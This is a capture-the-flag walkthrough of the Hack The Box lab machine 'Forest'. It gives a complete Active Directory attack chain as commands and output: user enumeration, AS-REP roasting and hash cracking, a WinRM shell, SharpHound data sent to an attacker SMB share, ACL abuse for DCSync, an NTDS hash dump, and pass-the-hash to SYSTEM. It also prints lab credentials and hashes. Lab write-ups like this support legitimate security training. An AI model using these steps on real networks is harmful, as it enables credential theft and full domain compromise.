HTB - Forest

Enumeration

---

Scope

IP Address: 10.10.10.161

Nmap Scan

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ nmap -p- --min-rate 10000 $ip -Pn

PORT    STATE SERVICE
88/tcp  open  kerberos-sec
135/tcp open  msrpc
139/tcp open  netbios-ssn
389/tcp open  ldap
445/tcp open  microsoft-ds
5985/tcp open   wsman

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ sudo nmap -sU $ip --min-rate 10000 --open -v -oN udp-scan -p1-10000

PORT    STATE SERVICE
88/udp  open  kerberos-sec
123/udp open  ntp
389/udp open  ldap

PORT     STATE SERVICE      VERSION
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-08 11:55:21Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2024-07-08T04:55:24-07:00
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 2h26m50s, deviation: 4h02m30s, median: 6m49s
| smb2-time: 
|   date: 2024-07-08T11:55:26
|_  start_date: 2024-07-08T11:39:10
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required

* Open ports: 88 - 135 - 139 - 389 - 445 - 5985
* UDP Open ports: 88 - 123 - 389
* Services:
* Versions:
* Important Notes:Domain: htb.local - Windows Server 2016 Standard 14393 - FQDN: FOREST.htb.local

Enumeration

SMB

smb enumerate didn't give any useful information

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ smbclient -N -L //$ip                                                                                                           
Anonymous login successful                                                                                                          
        Sharename       Type      Comment
        ---------       ----      -------                                                                                           
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.161 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)                                             
Unable to connect with SMB1 -- no workgroup available

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ crackmapexec smb $ip -u ''  -p '' --shares                                                                                      
SMB         10.10.10.161    445    FOREST           [+] htb.local\:
SMB         10.10.10.161    445    FOREST           [-] Error enumerating shares: STATUS_ACCESS_DENIED 

RPC

I managed to enumerate the domain users with rpcclient

rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]

I have to create users list and attempt further enumeration

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ cat user | cut -d\[ -f2 | cut -d\] -f1 | tee -a users.lst
Administrator
Guest
krbtgt
DefaultAccount
$331000-VK4ADACQNUCA
SM_2c8eef0a09b545acb
SM_ca8c2ed5bdab4dc9b
SM_75a538d3025e4db9a
SM_681f53d4942840e18
SM_1b41c9286325456bb
SM_9b69f1b9d2cc45549
SM_7c96b981967141ebb
SM_c75ee099d0a64c91b
SM_1ffab36a2f5f479cb
HealthMailboxc3d7722
HealthMailboxfc9daad
HealthMailboxc0a90c9
HealthMailbox670628e
HealthMailbox968e74d
HealthMailbox6ded678
HealthMailbox83d6781
HealthMailboxfd87238
HealthMailboxb01ac64
HealthMailbox7108a4e
HealthMailbox0659cc1
sebastien
lucinda
svc-alfresco
andy
mark
santi

Initial Access

---

Attempting the wordlist, we get from rpc enumeration against kerberos

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ kerbrute userenum --dc $ip -d htb.local -t 100 -o kerbrute.list ./users.lst

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 07/08/24 - Ronnie Flathers @ropnop

2024/07/08 07:57:51 >  Using KDC(s):
2024/07/08 07:57:51 >   10.10.10.161:88

2024/07/08 07:57:51 >  [+] VALID USERNAME:       Administrator@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       HealthMailboxc3d7722@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       HealthMailboxc0a90c9@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       HealthMailboxfc9daad@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       HealthMailbox670628e@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       HealthMailboxfd87238@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       HealthMailbox83d6781@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       HealthMailboxb01ac64@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       HealthMailbox6ded678@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       HealthMailbox968e74d@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       HealthMailbox7108a4e@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       lucinda@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       HealthMailbox0659cc1@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       sebastien@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       santi@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       andy@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       mark@htb.local
2024/07/08 07:57:51 >  [+] VALID USERNAME:       svc-alfresco@htb.local

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ cat kerbrute.list | awk '{print $7}' | cut -d@ -f1 | tee -a final.lst

Administrator
HealthMailboxc3d7722
HealthMailboxc0a90c9
HealthMailboxfc9daad
HealthMailbox670628e
HealthMailboxfd87238
HealthMailbox83d6781
HealthMailboxb01ac64
HealthMailbox6ded678
HealthMailbox968e74d
HealthMailbox7108a4e
lucinda
HealthMailbox0659cc1
sebastien
santi
andy
mark
svc-alfresco

The next step in my mind that I will attempt ASREP-Roasting against the users we found

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ impacket-GetNPUsers htb.local/ -dc-ip $ip -no-pass -request -format hashcat -usersfile final.lst 

<snip>
$krb5asrep$23$svc-alfresco@HTB.LOCAL:a473debb50bf904fbeb3373b6f4af273$7a560ca1c022b7ac876daf73cf210638777af7e21167a0041e8366a9ca4911646d8508c752e39380dd328584e1d58e7a99a9b78c92513a91588f98930656268f97e9a794360788fad1ef12994ae12ff6666bcc105c1b9c1f998e0e0848f84201728162f3bc8e2936bec57c7f90b71aedd27d81ec7617ea476aa2074132daa142aaa819e801f16d00a3ada0c4906aab0a19bf94441eb7c51f81e8ad6c293d0f0a5ab51a50741b86bb43a5129fb4d6971f4e72ead6255d3b1933563dfe8a3709adea833a3b5e4833c7aecff174df9ab35a0a2cac8a67c7df82439db9ccba053ee8b106e019ba8

I will then fire up hashcat and try to crack this hash

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ hashcat -m 18200 asrep.hash /usr/share/wordlists/rockyou.txt 

$krb5asrep$23$svc-alfresco@HTB.LOCAL:a473debb50bf904fbeb3373b6f4af273$7a560ca1c022b7ac876daf73cf210638777af7e21167a0041e8366a9ca4911646d8508c752e39380dd328584e1d58e7a99a9b78c92513a91588f98930656268f97e9a794360788fad1ef12994ae12ff6666bcc105c1b9c1f998e0e0848f84201728162f3bc8e2936bec57c7f90b71aedd27d81ec7617ea476aa2074132daa142aaa819e801f16d00a3ada0c4906aab0a19bf94441eb7c51f81e8ad6c293d0f0a5ab51a50741b86bb43a5129fb4d6971f4e72ead6255d3b1933563dfe8a3709adea833a3b5e4833c7aecff174df9ab35a0a2cac8a67c7df82439db9ccba053ee8b106e019ba8f:s3rvice

Session..........: hashcat
Status...........: Cracked

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ evil-winrm -i $ip -u svc-alfresco -p 's3rvice'

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> 

*Evil-WinRM* PS C:\Users\svc-alfresco> type Desktop\user.txt
c547a655316215e19xxxxxxxxxxxxxxxx

User Flag: c547a655316215e19xxxxxxxxxxxxxxxx

---

Privilege Escalation

In active directory enumeration, I'm used to run bloodhound.py as soon as possible if I obtain valid credentials but this time it failed, So I uploaded SharpHound.exe to the machine alternatively

*Evil-WinRM* PS C:\Users\svc-alfresco> .\SharpHound.exe -c All --zipfilename forest

<snip>
2024-07-08T05:22:16.0093511-07:00|INFORMATION|Status: 161 objects finished (+161 3.659091)/s -- Using 51 MB RAM
2024-07-08T05:22:16.0093511-07:00|INFORMATION|Enumeration finished in 00:00:44.7988005
2024-07-08T05:22:16.1343445-07:00|INFORMATION|SharpHound Enumeration Completed at 5:22 AM on 7/8/2024! Happy Graphing!

I will then start smb server and move the zip file generated to my attack host to upload it to bloodhound GUI

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ impacket-smbserver -smb2support share . -username blind0bandit -password blind0bandit
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Authenticate the windows box to my kali machine and then move the file

*Evil-WinRM* PS C:\Users\svc-alfresco> net use n: \\10.10.16.3\share /user:blind0bandit blind0bandit
The command completed successfully.

*Evil-WinRM* PS C:\Users\svc-alfresco> move 20240708052215_forest.zip n:

First, I searched for svc-alfresco account and click on Reachable High Value Targets as its value took my attention

svc-alfresco is a member of Service accounts which is a member of PRIVILEGED IT ACCOUNTS which is a member of ACCOUNT OPERATORS. It's a nested group membership :)

So, I can say that svc-alfresco is a member of Account operators group which is high privileged group.

• Further enumeration about Account operations group in bloodhound showed that It has GenericAll on EXCHANGE WINDOWS PERMISSIONS and that group has WriteDacl on the domain

  • GenericAll: It means a have full control on the object and in our situation, It can be abused by adding ourselves to that group

  • WriteDacl: It means that I can modify the object discretionary Access control list DACL and in our situation It can be abused by granting ourselves DCSync rights to be able to dump ntds database and get the hash of administrator

we can use PowerView.ps1 to abuse GenericAll & WriteDacl but I will use it only on GenericAll and use DCSync tool developed by n00py to make the attack easier

GitHub - n00py/DCSync: DCSync Attack from Outside using ImpacketGitHub

The main reason why I didn't use PowerView to modify DACL is that I struggled solving this machine before as there is a script that reset everything to default settings and even you're fast, you might fail

Clone the repository from github to /opt directory

┌──(kali㉿kali)-[/opt]
└─$ sudo git clone https://github.com/n00py/DCSync.git  

Use net command to see current group membership

*Evil-WinRM* PS C:\Users\svc-alfresco> net user svc-alfresco

<snip>
Global Group memberships     *Domain Users         *Service Accounts

Execute the following commands to add ourselves to EXCHANGE WINDOWS PERMISSIONS Group

*Evil-WinRM* PS C:\Users\svc-alfresco> upload PowerView.ps1

import-module .\PowerView.ps1
$pass = ConvertTo-SecureString -Force -AsPlainText 's3rvice'
$cred = New-Object System.Management.Automation.PSCredential("htb.local\svc-alfresco", $pass)
Add-DomainGroupMember -Identity 'EXCHANGE WINDOWS PERMISSIONS' -Members 'svc-alfresco' -Credential $cred

Verify

*Evil-WinRM* PS C:\Users\svc-alfresco> net user svc-alfresco

<snip>
Global Group memberships     *Exchange Windows Perm*Domain Users
                             *Service Accounts
The command completed successfully.

• DSCync.py need some options we need to get

  • FQDN

  • distinguishedname

We get the FQDN from Nmap Script Scan before => Forest.htb.local

And for distinguishedname, we can get using PowerView

*Evil-WinRM* PS C:\Users\svc-alfresco> Get-DomainUser -Identity svc-alfresco | select-Object -Property distinguishedname

distinguishedname
-----------------
CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local

Now, we're ready to Start the attack.

I run the tool and fire-up crackmapexec in one-linear cause there is a script that will reset the settings as I said before

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ python3 /opt/DCSync/DCSync.py -dc forest.htb.local -t "CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local"  htb.local\\svc-alfresco:'s3rvice'; crackmapexec smb $ip -u svc-alfresco -p 's3rvice' --ntds

[*] Starting DCSync Attack against CN=svc-alfresco,OU=Service Accounts,DC=htb,DC=local
[*] Initializing LDAP connection to forest.htb.local
[*] Using htb.local\svc-alfresco account with password ***
[*] LDAP bind OK
[*] Initializing domainDumper()
[*] Initializing LDAPAttack()
[*] Querying domain security descriptor
[*] Success! User svc-alfresco now has Replication-Get-Changes-All privileges on the domain
[*] Try using DCSync with secretsdump.py and this user :)
[*] Saved restore state to aclpwn-20240708-102656.restore
SMB         10.10.10.161    445    FOREST           [*] Windows Server 2016 Standard 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
SMB         10.10.10.161    445    FOREST           [+] htb.local\svc-alfresco:s3rvice 
SMB         10.10.10.161    445    FOREST           [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
SMB         10.10.10.161    445    FOREST           [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         10.10.10.161    445    FOREST           htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb4xxxxxxxxxxxxxx:::
SMB         10.10.10.161    445    FOREST           Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.10.161    445    FOREST           krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
SMB         10.10.10.161    445    FOREST           DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.10.161    445    FOREST           htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.10.161    445    FOREST           htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.10.161    445    FOREST           htb.local\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.10.161    445    FOREST           htb.local\SM_75a538d3025e4db9a:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.10.161    445    FOREST           htb.local\SM_681f53d4942840e18:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.10.161    445    FOREST           htb.local\SM_1b41c9286325456bb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.10.161    445    FOREST           htb.local\SM_9b69f1b9d2cc45549:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.10.161    445    FOREST           htb.local\SM_7c96b981967141ebb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.10.161    445    FOREST           htb.local\SM_c75ee099d0a64c91b:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.10.161    445    FOREST           htb.local\SM_1ffab36a2f5f479cb:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.10.10.161    445    FOREST           htb.local\HealthMailboxc3d7722:1134:aad3b435b51404eeaad3b435b51404ee:4761b9904a3d88c9c9341ed081b4ec6f:::
SMB         10.10.10.161    445    FOREST           htb.local\HealthMailboxfc9daad:1135:aad3b435b51404eeaad3b435b51404ee:5e89fd2c745d7de396a0152f0e130f44:::
SMB         10.10.10.161    445    FOREST           htb.local\HealthMailboxc0a90c9:1136:aad3b435b51404eeaad3b435b51404ee:3b4ca7bcda9485fa39616888b9d43f05:::
SMB         10.10.10.161    445    FOREST           htb.local\HealthMailbox670628e:1137:aad3b435b51404eeaad3b435b51404ee:e364467872c4b4d1aad555a9e62bc88a:::
SMB         10.10.10.161    445    FOREST           htb.local\HealthMailbox968e74d:1138:aad3b435b51404eeaad3b435b51404ee:ca4f125b226a0adb0a4b1b39b7cd63a9:::
SMB         10.10.10.161    445    FOREST           htb.local\HealthMailbox6ded678:1139:aad3b435b51404eeaad3b435b51404ee:c5b934f77c3424195ed0adfaae47f555:::
SMB         10.10.10.161    445    FOREST           htb.local\HealthMailbox83d6781:1140:aad3b435b51404eeaad3b435b51404ee:9e8b2242038d28f141cc47ef932ccdf5:::
SMB         10.10.10.161    445    FOREST           htb.local\HealthMailboxfd87238:1141:aad3b435b51404eeaad3b435b51404ee:f2fa616eae0d0546fc43b768f7c9eeff:::
SMB         10.10.10.161    445    FOREST           htb.local\HealthMailboxb01ac64:1142:aad3b435b51404eeaad3b435b51404ee:0d17cfde47abc8cc3c58dc2154657203:::
SMB         10.10.10.161    445    FOREST           htb.local\HealthMailbox7108a4e:1143:aad3b435b51404eeaad3b435b51404ee:d7baeec71c5108ff181eb9ba9b60c355:::
SMB         10.10.10.161    445    FOREST           htb.local\HealthMailbox0659cc1:1144:aad3b435b51404eeaad3b435b51404ee:900a4884e1ed00dd6e36872859c03536:::
SMB         10.10.10.161    445    FOREST           htb.local\sebastien:1145:aad3b435b51404eeaad3b435b51404ee:96246d980e3a8ceacbf9069173fa06fc:::
SMB         10.10.10.161    445    FOREST           htb.local\lucinda:1146:aad3b435b51404eeaad3b435b51404ee:4c2af4b2cd8a15b1ebd0ef6c58b879c3:::
SMB         10.10.10.161    445    FOREST           htb.local\svc-alfresco:1147:aad3b435b51404eeaad3b435b51404ee:9248997e4ef68ca2bb47ae4e6f128668:::
SMB         10.10.10.161    445    FOREST           htb.local\andy:1150:aad3b435b51404eeaad3b435b51404ee:29dfccaf39618ff101de5165b19d524b:::
SMB         10.10.10.161    445    FOREST           htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7:::
SMB         10.10.10.161    445    FOREST           htb.local\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072:::
SMB         10.10.10.161    445    FOREST           FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:16b31bf83c954c24b824a6c34b81f5eb:::
SMB         10.10.10.161    445    FOREST           EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::

Access the machine as SYSTEM

┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Forest]
└─$ impacket-psexec htb.local/administrator@$ip -hashes :32693b11e6aa90eb4xxxxxxxxxxxxxx
<snip>
C:\Windows\system32> 

And finally get the root flag :)

C:\Windows\system32> cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop> type root.txt
689637a422c46e0e07xxxxxxxxxxxxxxxxxxx

Root Flag: 689637a422c46e0e07xxxxxxxxxxxxxxxxxxx